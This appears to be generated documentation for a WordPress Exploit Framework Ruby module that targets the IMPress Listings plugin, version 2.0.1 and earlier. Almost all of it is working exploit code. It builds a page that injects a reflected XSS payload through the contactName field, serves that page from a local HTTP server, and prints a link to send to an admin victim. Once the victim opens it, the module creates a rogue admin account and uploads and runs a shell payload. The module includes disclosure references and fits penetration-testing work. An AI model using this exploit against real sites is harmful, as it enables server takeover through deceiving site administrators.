class Wpxf::Exploit::ImpressListingsReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 7 def initialize super update_info( name: 'IMPress Listings <= 2.0.1 Reflected XSS Shell Upload', desc: 'This module prepares a payload and link that can be sent to an '\ 'admin user which when visited with a valid session will create '\ 'a new admin user which will be used to upload and execute the '\ 'selected payload in the context of the web server.', author: [ 'Kris <https://twitter.com/@CTFKris>', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8370'], ['URL', 'https://github.com/agentevolution/wp-listings/pull/52'] ], date: 'Jan 27 2016' ) register_options([ StringOption.new( name: 'initial_req_path', desc: 'The path to be used to identify the initial request', required: true, default: Utility::Text.rand_alpha(rand(5..10)) ), StringOption.new( name: 'listing_url', desc: 'The URL of a valid listing generated by the plugin', required: true ), ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 42 def check check_plugin_version_from_readme('wp-listings', '2.0.2') end
initial_req_path()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 46 def initial_req_path normalized_option_value('initial_req_path') end
initial_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 54 def initial_script %Q|<html><head></head><body> <script> #{js_post} post('#{datastore['listing_url']}', { contactName: '"><script>#{xss_ascii_encoded_include_script}<\\/script><"' }); </script> </body></html> | end
initial_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 50 def initial_url normalize_uri(xss_url, initial_req_path) end
on_http_request(path, params, headers)
click to toggle source
Calls superclass method
Wpxf::WordPress::Xss#on_http_request
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 66 def on_http_request(path, params, headers) if path.eql? normalize_uri(xss_path, initial_req_path) emit_info 'Initial request received...' return { type: 'text/html', body: initial_script } else super end end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 75 def run return false unless super @success = false emit_info 'Provide the URL below to the victim to begin the payload upload' puts puts initial_url puts start_http_server return @success end